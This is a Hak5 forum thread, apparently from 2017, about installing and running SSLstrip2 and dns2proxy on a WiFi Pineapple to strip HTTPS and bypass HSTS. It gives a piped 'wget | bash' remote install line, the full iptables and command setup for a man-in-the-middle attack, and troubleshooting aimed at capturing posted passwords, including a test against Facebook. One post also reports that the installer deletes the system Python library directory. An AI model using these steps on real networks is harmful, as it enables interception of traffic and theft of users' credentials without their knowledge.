Jump to content
Hak5 Forums
Zylla

SSLstrip2 + dns2proxy (HSTS Bypassing)

Recommended Posts

SSLstrip2 + dns2proxy
Now WORKING on the Pineapple NANO + TETRA.


Last update: 15.01.2017
Changelog:

  • Uploaded everything to github.


Install procedure:

root@Pineapple:~#  wget -qO- https://raw.githubusercontent.com/adde88/sslstrip-hsts-openwrt/master/INSTALL.sh | bash -s -- -v -v

(This launches a install script that downloads a .ipk file containing the tools, and installs all the python-libaries correctly.)


What now?
sslstrip2 and dns2proxy gets installed to /usr/share/, or /sd/usr/share when using the Pineapple NANO.
When using dns2proxy, please check that you traverse into its directory before launching it. (If not you might encounter errors about missing files: (nospoof.cfg) etc.)

root@Pineapple:~# cd /sd/usr/share/sslstrip2/
root@Pineapple:~# python sslstrip.py --help

root@Pineapple:~# cd /sd/usr/share/dns2proxy/
root@Pineapple:~# python dns2proxy.py --help


Github repo. + source-files:
https://github.com/adde88/sslstrip-hsts-openwrt
 

OPKG Installation File: (For those who want to install it manually)
https://github.com/adde88/sslstrip-hsts-openwrt/raw/master/sslstrip-hsts_0.9_ar71xx.ipk

  • Like 1
  • Upvote 2

Share this post


Link to post
Share on other sites
1 minute ago, mercredi said:

Hi,

Thank you for your work!

Everything works good, but a can't see any credentials on log files.

Good to hear that it's working!
About the logs: how du you launch sslstrip? what options are you supplying when start it? (like the exact command you are issuing to start it)

  • Like 1

Share this post


Link to post
Share on other sites

First i run

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python sslstrip.py -l 9000 -p -w log.txt
python dns2proxy.py

 

 

 

I got this error when i run: python sslstrip.py -l 9000 -p -w log.txt

sslstrip 0.9 + by Moxie Marlinspike running...
+ POC by Leonardo Nve
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived
    why = self.lineReceived(line)
  File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived
    self.handleHeader(key, val)
  File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader
    self.client.responseHeaders.addRawHeader(key, value)
exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived
    why = self.lineReceived(line)
  File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived
    self.handleHeader(key, val)
  File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader
    self.client.responseHeaders.addRawHeader(key, value)
exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'

 

Share this post


Link to post
Share on other sites

For the time being you'll need to download and use it over terminal.

And i don't have a ETA on a module. But i hope to have it ready soon. :)

  • Like 1
  • Upvote 1

Share this post


Link to post
Share on other sites
23 hours ago, mercredi said:

First i run


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000

iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

python sslstrip.py -l 9000 -p -w log.txt

python dns2proxy.py

 

 

 

I got this error when i run: python sslstrip.py -l 9000 -p -w log.txt

sslstrip 0.9 + by Moxie Marlinspike running...
+ POC by Leonardo Nve
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived
    why = self.lineReceived(line)
  File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived
    self.handleHeader(key, val)
  File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader
    self.client.responseHeaders.addRawHeader(key, value)
exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived
    why = self.lineReceived(line)
  File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived
    self.handleHeader(key, val)
  File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader
    self.client.responseHeaders.addRawHeader(key, value)
exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'

 

I'll do some testing later today, and see if i can replicate the issue. :)

  • Upvote 1

Share this post


Link to post
Share on other sites
1 hour ago, Zylla said:

I'll do some testing later today, and see if i can replicate the issue. :)

thanks

 

Which command did you use to make it work and see SSL POST? I try all option, but i can see only http.

Share this post


Link to post
Share on other sites
On 17.1.2017 at 6:11 PM, mercredi said:

thanks

 

Which command did you use to make it work and see SSL POST? I try all option, but i can see only http.

In the iptables command you used above you are only redirecting port 80 (HTTP).
You will need to redirect the HTTPS port (443) if you want to get that traffic aswell.
That would explain why you're not seeing any encrypted traffic.

Share this post


Link to post
Share on other sites

It seems like i might have slept to little the last week, lol.
You're not supposed to redirect port 443.

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python dns2proxy.py -i $interface_name_here
python sslstrip.py -a -w /tmp/sslstrip_log

(replace "$interface_name_here" with the interface you are using)


Here's the usage of both tools:
sslstrip+

sslstrip 0.9 + by Moxie Marlinspike
Version + by Leonardo Nve
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

 

dns2proxy:

usage: dns2proxy.py [-h] [-N] [-i INTERFACE] [-u IP1] [-d IP2] [-I IPS] [-S]
                    [-A ADMINIP]

optional arguments:
  -h, --help            show this help message and exit
  -N, --noforward       DNS Fowarding OFF (default ON)
  -i INTERFACE, --interface INTERFACE
                        Interface to use
  -u IP1, --ip1 IP1     First IP to add at the response
  -d IP2, --ip2 IP2     Second IP to add at the response
  -I IPS, --ips IPS     List of IPs to add after ip1,ip2 separated with commas
  -S, --silent          Silent mode
  -A ADMINIP, --adminIP ADMINIP
                        Administrator IP for no filtering
  • Upvote 1

Share this post


Link to post
Share on other sites

What is the exact command to see encrypted traffic?  

On 1/16/2017 at 8:07 AM, Zylla said:

Good to hear that it's working!
About the logs: how du you launch sslstrip? what options are you supplying when start it? (like the exact command you are issuing to start it)

 

Share this post


Link to post
Share on other sites
12 hours ago, Grognak said:

What is the exact command to see encrypted traffic?  

 

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python dns2proxy.py -i $interface_name_here
python sslstrip.py -a -w /tmp/sslstrip_log

Share this post


Link to post
Share on other sites
On 20.1.2017 at 7:18 PM, crazyclown said:

Will this work on the Mark V Firmware 2.4?

Sadly my Mark VI is dead, but i am pretty certain that one guy in this thread tested it, and mentioned that it was working.
You could just test it and report back. I don't see any special reasons for it not working.

Share this post


Link to post
Share on other sites

I'm interested! Planning to install this to my Wifi Pineapple NANO later today, but was curious about something. Can I have this running in the background (Connect to SSH, launch applications as instructed, then disconnect from SSH)? If so, will this work alongside other modules, such as DWall? Please excuse my lack of knowledge, I'm still learning.

Share this post


Link to post
Share on other sites
On 2/8/2017 at 2:00 AM, Null Trace said:

I'm interested! Planning to install this to my Wifi Pineapple NANO later today, but was curious about something. Can I have this running in the background (Connect to SSH, launch applications as instructed, then disconnect from SSH)? If so, will this work alongside other modules, such as DWall? Please excuse my lack of knowledge, I'm still learning.

Hey Null Trace, you can have it running in the background if you install screen.

You can install this by using:

opkg install screen

and then when you ssh in run screen first, by typing 'screen' and then run the commands and before disconnecting hitting CTRL-A and then D.

To retrieve your screen session type 'screen -r' if you have more then one screen instance it will list them and you will need to type 'screen -r 4322' for example.

If you want to close a screen instance retrieve it as above and type 'exit'.

As for running DWall etc I'm note sure if it will work alongside sorry :)

Hope this helps.

  • Upvote 2

Share this post


Link to post
Share on other sites

Hello,

I "seem" to have this working, as in no errors and I can see all the dnsproxy info flashing accross the screen.  I am not able to capture any passwords (i did a test with facebook.com and typed in a bogus email and password).  I also used tcpdump and looked at the results.  My data is still encrypted so thats why I cannot see my email address or password.  Anyone have any ideas?  Below are the commands I'm using.

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

python dns2proxy.py -i wlan0  

python sslstrip.py -a -w /tmp/sslstrip_log

* wlan0 is the interface im hosting my AP on.  Please see attachment for networking screen.

 

Thanks!!

Scrag

 

network.PNG

Edited by Scrag
  • Upvote 1

Share this post


Link to post
Share on other sites

Hey Everybody.

I was really hoping someone could help a noob out  ;)

I "almost" got this working but I am stuck.  It appears dns2proxy is working but sslstrip is not.  Sslstrip just sits there after loading and does not display any info, and of course, does not strip ssl.

Here is what I'm doing:

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

cd /sd/usr/share/dns2proxy/
python dns2proxy.py

cd /sd/usr/share/sslstrip2/
python sslstrip.py -a -w /sd/ssltrip-log.txt

I can visually see all kinds of responses on the dns2proxy screen, but for sslstrip, it just sits at

sslstrip 0.9 + by Moxie Marlinspike running...
+ POC by Leonardo Nve

Any thoughts?

 

Thanks!

Scrag

  • Upvote 1

Share this post


Link to post
Share on other sites

Okey. To clear things up a bit.
SSLstrip2 + dns2proxy does not work on every site. Good examples are Google and Facebook.
Browsers and sites have implemented fixes against this attack, like caching.

But it does have more success-chance compared to regular boring sslstrip :)

  • Upvote 2

Share this post


Link to post
Share on other sites

Any news on updates like a module or something sweet?

Would very much like to see a module :P

Share this post


Link to post
Share on other sites
On 10.3.2017 at 5:16 AM, Tar said:

Any news on updates like a module or something sweet?

Would very much like to see a module :P

Hi there!
I do have plans for making a module.
It's just that other stuff have been higher on my agenda, and i've got very few hours per day to work on stuff like this (work, kids, wife, etc.).

The module for the Mana Toolkit is my main project at the moment.
I actually didn't intend to make sslstrip+ into a project of its own, it just sorta' sprung out because it's a part of the Mana attack.
I thought people who wasn't interested in Mana could still have an interest in sslstrip+, so i just made an installation package for people to enjoy.

But it seems it could really need a module. So hopefully i got something soon :)

  • Upvote 2

Share this post


Link to post
Share on other sites
On 3/14/2017 at 8:23 AM, Zylla said:

Hi there!
I do have plans for making a module.
It's just that other stuff have been higher on my agenda, and i've got very few hours per day to work on stuff like this (work, kids, wife, etc.).

The module for the Mana Toolkit is my main project at the moment.
I actually didn't intend to make sslstrip+ into a project of its own, it just sorta' sprung out because it's a part of the Mana attack.
I thought people who wasn't interested in Mana could still have an interest in sslstrip+, so i just made an installation package for people to enjoy.

But it seems it could really need a module. So hopefully i got something soon :)

Hehe, yeah man a module would be great :P

One of the main reasons I got the wifipineapple was to use SSLstrip on my network, take your time lad looking for some great things out of this community :)

Share this post


Link to post
Share on other sites

To those installing this, you may want to go though the INSTALL.sh script and install the relevant components manually. If you have an SD card in your NANO, the INSTALL.sh script will wipe out /usr/lib/python2.7 before trying to symlink a new '/sd/usr/lib/python2.7' directory it creates on the SD card. Bad news if you're already running Python stuff on your NANO.

 

 

 

Share this post


Link to post
Share on other sites
2 minutes ago, Dirty Frank said:

To those installing this, you may want to go though the INSTALL.sh script and install the relevant components manually. If you have an SD card in your NANO, the INSTALL.sh script will wipe out /usr/lib/python2.7 before trying to symlink a new '/sd/usr/lib/python2.7' directory it creates on the SD card. Bad news if you're already running Python stuff on your NANO.

 

 

 

You are totally correct about the script wiping out the python directory. (/usr/lib/python2.7)
I had tons of issues with Python on the Nano. It seems to get confused when having "two python directories". One internal, and one on the SD-card.
For simplicity, and also because of the size of the libraries, i found it much better to have one directory on the SD-card and just sym-link that to the other directory.

But i guess, i can create warning message in the installer-script. Just in case :)

Share this post


Link to post
Share on other sites
2 hours ago, Zylla said:

You are totally correct about the script wiping out the python directory. (/usr/lib/python2.7)
I had tons of issues with Python on the Nano. It seems to get confused when having "two python directories". One internal, and one on the SD-card.
For simplicity, and also because of the size of the libraries, i found it much better to have one directory on the SD-card and just sym-link that to the other directory.

But i guess, i can create warning message in the installer-script. Just in case :)

How about the installer symlink the installed files instead of the directory iteself (ala install the pkg to /sd and then "ln -s /sd/usr/lib/python2.7/* /usr/lib/python2.7" ?

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×